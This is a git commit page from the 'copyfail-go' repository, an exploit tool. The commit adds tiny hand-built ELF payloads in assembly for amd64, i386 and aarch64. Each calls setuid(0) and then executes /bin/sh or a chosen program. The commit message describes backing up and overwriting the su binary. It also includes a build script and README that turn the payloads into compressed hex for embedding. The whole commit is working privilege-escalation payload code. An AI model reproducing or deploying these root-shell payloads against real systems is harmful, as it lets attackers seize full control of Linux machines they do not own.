milliways-infosec/copyfail-go
5
0
Fork 0
mirror of https://github.com/badsectorlabs/copyfail-go.git synced 2026-05-16 06:30:10 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

feat: allow binary exec and improve documentation

Browse source 
- Added new shellcode payloads for exec-argv1 and exec-bin-sh for amd64, i386, and aarch64 architectures.
- Introduced a backup feature for the su binary before overwriting it.
- Enhanced README.md with usage instructions and details about affected kernels.
- Added build-n-print.sh script for building and printing payloads in hex format.
This commit is contained in:
kernel-sanders 2026-04-30 01:33:04 -04:00
parent e52acbb172
commit 131f7d1842
12 changed files with 552 additions and 63 deletions
Download patch file Download diff file Expand all files Collapse all files

19
payloads/README.md Normal file
View file

@ -0,0 +1,19 @@
These are the assembly and binary payloads embedded in copyfail-go
## Scripted
Just run `build-n-print.sh`
## Manual
To build the asm run
```shell
nasm -f bin {{ payload }}.asm -o {{ payload }}
```
To format the binary into the hex for copyfail-go, run
```shell
cat {{ payload }} | python3 -c 'import sys, zlib; print(zlib.compress(sys.stdin.buffer.read()).hex())'
```

37
payloads/build-n-print.sh Normal file
View file

@ -0,0 +1,37 @@
#!/bin/bash
# Check for nasm
if ! command -v nasm &> /dev/null; then
echo "[!] nasm could not be found. Please install it."
exit 1
fi
# Check for python3
if ! command -v python3 &> /dev/null; then
echo "[!] python3 could not be found. Please install it."
exit 1
fi
for payload in *.asm; do
echo "[+] Building $payload"
nasm -f bin $payload -o ${payload%.asm}
echo "[+] Printing $payload as hex"
cat ${payload%.asm} | python3 -c 'import sys, zlib; print(zlib.compress(sys.stdin.buffer.read()).hex())'
done
# Check for aarch64-linux-gnu-as
if ! command -v aarch64-linux-gnu-as &> /dev/null; then
echo "[!] aarch64-linux-gnu-as could not be found. Please install binutils-aarch64-linux-gnu"
exit 1
fi
for payload in *.S; do
# Assemble the source into an object file
echo "[+] Building $payload"
aarch64-linux-gnu-as $payload -o ${payload%.S}.o
# Extract ONLY the raw bytes into a flat binary file
echo "[+] Extracting $payload as binary"
aarch64-linux-gnu-objcopy -O binary ${payload%.S}.o ${payload%.S}
echo "[+] Printing $payload as hex"
cat ${payload%.S} | python3 -c 'import sys, zlib; print(zlib.compress(sys.stdin.buffer.read()).hex())'
done

53
payloads/exec-argv1-aarch64.S Normal file
View file

@ -0,0 +1,53 @@
.section .text
.globl _start
// --- 64-bit ELF Header ---
ehdr:
.byte 0x7F, 0x45, 0x4c, 0x46 // "\x7fELF"
.byte 2, 1, 1, 0 // 64-bit, little-endian, version 1
.byte 0, 0, 0, 0, 0, 0, 0, 0
.short 2 // e_type: Executable
.short 183 // e_machine: AArch64 (0xB7)
.int 1 // e_version
.quad 0x400078 // e_entry (0x400000 + 0x78)
.quad 0x40 // e_phoff (Program Header offset)
.quad 0 // e_shoff
.int 0 // e_flags
.short 64 // e_ehsize
.short 56 // e_phentsize
.short 1 // e_phnum
.short 0 // e_shentsize
.short 0 // e_shnum
.short 0 // e_shstrndx
// --- Program Header (PT_LOAD) ---
phdr:
.int 1 // p_type: PT_LOAD
.int 5 // p_flags: PF_R | PF_X
.quad 0 // p_offset
.quad 0x400000 // p_vaddr
.quad 0x400000 // p_paddr
.quad file_end - ehdr // p_filesz
.quad file_end - ehdr // p_memsz
.quad 0x10000 // p_align
// --- Payload ---
_start:
// setuid(0)
mov x0, #0
mov x8, #146 // SYS_setuid
svc #0
// execve(argv[1], NULL, NULL)
ldr x0, [sp, #16] // x0 = argv[1]
mov x1, #0 // x1 = NULL
mov x2, #0 // x2 = NULL
mov x8, #221 // SYS_execve
svc #0
// exit(0)
mov x0, #0
mov x8, #93 // SYS_exit
svc #0
file_end:

54
payloads/exec-argv1-amd64.asm Normal file
View file

@ -0,0 +1,54 @@
BITS 64
org 0x400000
; --- 64-bit ELF Header ---
ehdr:
db 0x7F, "ELF", 2, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0
dw 2 ; e_type: Executable
dw 0x3e ; e_machine: x86-64
dd 1 ; e_version
dq _start ; e_entry
dq phdr - ehdr ; e_phoff (offset to program header)
dq 0 ; e_shoff
dd 0 ; e_flags
dw 64 ; e_ehsize (ELF header size)
dw 56 ; e_phentsize (Program header size)
dw 1 ; e_phnum (Number of program headers)
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
; --- Program Header (PT_LOAD) ---
phdr:
dd 1 ; p_type: PT_LOAD
dd 5 ; p_flags: PF_R | PF_X (Read + Execute)
dq 0 ; p_offset
dq 0x400000 ; p_vaddr
dq 0x400000 ; p_paddr
dq file_end - ehdr ; p_filesz
dq file_end - ehdr ; p_memsz
dq 0x1000 ; p_align
; --- Payload ---
_start:
; setuid(0)
xor eax, eax
xor edi, edi
mov al, 0x69
syscall
; execve(argv[1], NULL, NULL)
mov rdi,[rsp+0x10]
xor esi, esi
push 0x3b
pop rax
cdq
syscall
; exit(0)
xor edi, edi
push 0x3c
pop rax
syscall
file_end:

59
payloads/exec-argv1-i386.asm Normal file
View file

@ -0,0 +1,59 @@
BITS 32
org 0x08048000
; --- 32-bit ELF Header ---
ehdr:
db 0x7F, "ELF" ; e_ident
db 1 ; EI_CLASS (1 = 32-bit)
db 1 ; EI_DATA (1 = little endian)
db 1 ; EI_VERSION
db 0 ; EI_OSABI
db 0, 0, 0, 0, 0, 0, 0, 0
dw 2 ; e_type: Executable
dw 3 ; e_machine: EM_386 (x86)
dd 1 ; e_version
dd _start ; e_entry
dd phdr - ehdr ; e_phoff (offset to program header)
dd 0 ; e_shoff
dd 0 ; e_flags
dw 52 ; e_ehsize (32-bit ELF header size)
dw 32 ; e_phentsize (32-bit Program header size)
dw 1 ; e_phnum (Number of program headers)
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
; --- Program Header (PT_LOAD) ---
phdr:
dd 1 ; p_type: PT_LOAD
dd 0 ; p_offset
dd 0x08048000 ; p_vaddr
dd 0x08048000 ; p_paddr
dd file_end - ehdr ; p_filesz
dd file_end - ehdr ; p_memsz
dd 5 ; p_flags: PF_R | PF_X (Read + Execute)
dd 0x1000 ; p_align
; --- Payload ---
_start:
; setuid32(0)
xor eax, eax
xor ebx, ebx ; ebx = 0 (UID)
mov al, 213 ; sys_setuid32 (213)
int 0x80
; execve(argv[1], NULL, NULL)
mov ebx, [esp+8] ; ebx = argv[1] (pointers are 4 bytes, so[esp+8])
xor ecx, ecx ; ecx = NULL
push 11 ; sys_execve (11)
pop eax
cdq ; edx = 0 (sign-extends eax into edx)
int 0x80
; exit(0)
xor ebx, ebx ; Exit code 0
push 1 ; sys_exit (1)
pop eax
int 0x80
file_end:

54
payloads/exec-bin-sh-aarch64.S Normal file
View file

@ -0,0 +1,54 @@
.section .text
.globl _start
// --- 64-bit ELF Header (64 bytes) ---
ehdr:
.byte 0x7F, 0x45, 0x4c, 0x46 // "\x7fELF"
.byte 2, 1, 1, 0 // 64-bit, little-endian, version 1
.byte 0, 0, 0, 0, 0, 0, 0, 0
.short 2 // e_type: Executable
.short 183 // e_machine: AArch64 (0xB7)
.int 1 // e_version
.quad 0x400078 // e_entry (0x400000 + 0x78)
.quad 0x40 // e_phoff (Program Header offset)
.quad 0 // e_shoff
.int 0 // e_flags
.short 64 // e_ehsize
.short 56 // e_phentsize
.short 1 // e_phnum
.short 0 // e_shentsize
.short 0 // e_shnum
.short 0 // e_shstrndx
// --- Program Header (PT_LOAD, 56 bytes) ---
phdr:
.int 1 // p_type: PT_LOAD
.int 5 // p_flags: PF_R | PF_X
.quad 0 // p_offset
.quad 0x400000 // p_vaddr
.quad 0x400000 // p_paddr
.quad file_end - ehdr // p_filesz
.quad file_end - ehdr // p_memsz
.quad 0x10000 // p_align
// --- Payload (52 bytes) ---
_start:
mov x0, #0
mov x8, #146 // SYS_setuid
svc #0
adr x0, sh // PC-relative load of the "sh" label
mov x1, #0
mov x2, #0
mov x8, #221 // SYS_execve
svc #0
mov x0, #0
mov x8, #93 // SYS_exit
svc #0
sh:
.asciz "/bin/sh" // 8 bytes (includes null terminator)
file_end:

56
payloads/exec-bin-sh-amd64.asm Normal file
View file

@ -0,0 +1,56 @@
BITS 64
org 0x400000
; --- 64-bit ELF Header ---
ehdr:
db 0x7F, "ELF", 2, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0
dw 2 ; e_type: Executable
dw 0x3e ; e_machine: x86-64
dd 1 ; e_version
dq _start ; e_entry
dq phdr - ehdr ; e_phoff (offset to program header)
dq 0 ; e_shoff
dd 0 ; e_flags
dw 64 ; e_ehsize (ELF header size)
dw 56 ; e_phentsize (Program header size)
dw 1 ; e_phnum (Number of program headers)
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
; --- Program Header (PT_LOAD) ---
phdr:
dd 1 ; p_type: PT_LOAD
dd 5 ; p_flags: PF_R | PF_X (Read + Execute)
dq 0 ; p_offset
dq 0x400000 ; p_vaddr
dq 0x400000 ; p_paddr
dq file_end - ehdr ; p_filesz
dq file_end - ehdr ; p_memsz
dq 0x1000 ; p_align
; --- Payload ---
_start:
; setuid(0)
xor eax, eax
xor edi, edi
mov al, 0x69
syscall
; execve("/bin/sh", NULL, NULL)
lea rdi, [rel sh] ; 48 8d 3d 0f 00 00 00 rdi -> "/bin/sh"
xor esi, esi ; 31 f6 rsi = 0 (argv = NULL)
push 0x3b ; 6a 3b push SYS_execve
pop rax ; 58 rax = 59
cdq ; 99 rdx = 0 (envp = NULL)
syscall ; 0f 05 execve("/bin/sh", 0, 0)
; exit(0)
xor edi, edi
push 0x3c
pop rax
syscall
sh: db "/bin/sh", 0
file_end:

64
payloads/exec-bin-sh-i386.asm Normal file
View file

@ -0,0 +1,64 @@
BITS 32
org 0x08048000
; --- 32-bit ELF Header ---
ehdr:
db 0x7F, "ELF" ; e_ident
db 1 ; EI_CLASS (1 = 32-bit)
db 1 ; EI_DATA (1 = little endian)
db 1 ; EI_VERSION
db 0 ; EI_OSABI
db 0, 0, 0, 0, 0, 0, 0, 0
dw 2 ; e_type: Executable
dw 3 ; e_machine: EM_386 (x86)
dd 1 ; e_version
dd _start ; e_entry
dd phdr - ehdr ; e_phoff (offset to program header)
dd 0 ; e_shoff
dd 0 ; e_flags
dw 52 ; e_ehsize (32-bit ELF header size)
dw 32 ; e_phentsize (32-bit Program header size)
dw 1 ; e_phnum (Number of program headers)
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
; --- Program Header (PT_LOAD) ---
phdr:
dd 1 ; p_type: PT_LOAD
dd 0 ; p_offset
dd 0x08048000 ; p_vaddr
dd 0x08048000 ; p_paddr
dd file_end - ehdr ; p_filesz
dd file_end - ehdr ; p_memsz
dd 5 ; p_flags: PF_R | PF_X (Read + Execute)
dd 0x1000 ; p_align
; --- Payload ---
_start:
; setuid32(0)
xor eax, eax
xor ebx, ebx ; ebx = 0 (UID)
mov al, 213 ; sys_setuid32 (213)
int 0x80
; execve("/bin/sh", ["/bin/sh", NULL], NULL)
xor eax, eax ; 31 c0 eax = 0
push eax ; 50 NULL terminator for argv
push 0x68732f2f ; 68 2f 2f 73 68 "//sh"
push 0x6e69622f ; 68 2f 62 69 6e "/bin"
mov ebx, esp ; 89 e3 ebx -> "/bin//sh"
push eax ; 50 envp = NULL
push ebx ; 53 argv[0] = "/bin//sh"
mov ecx, esp ; 89 e1 ecx -> argv
mov edx, eax ; 89 c2 edx = 0 (envp)
mov al, 0xb ; b0 0b eax = 11 (SYS_execve)
int 0x80 ; cd 80 syscall
; exit(0)
xor ebx, ebx ; Exit code 0
push 1 ; sys_exit (1)
pop eax
int 0x80
file_end: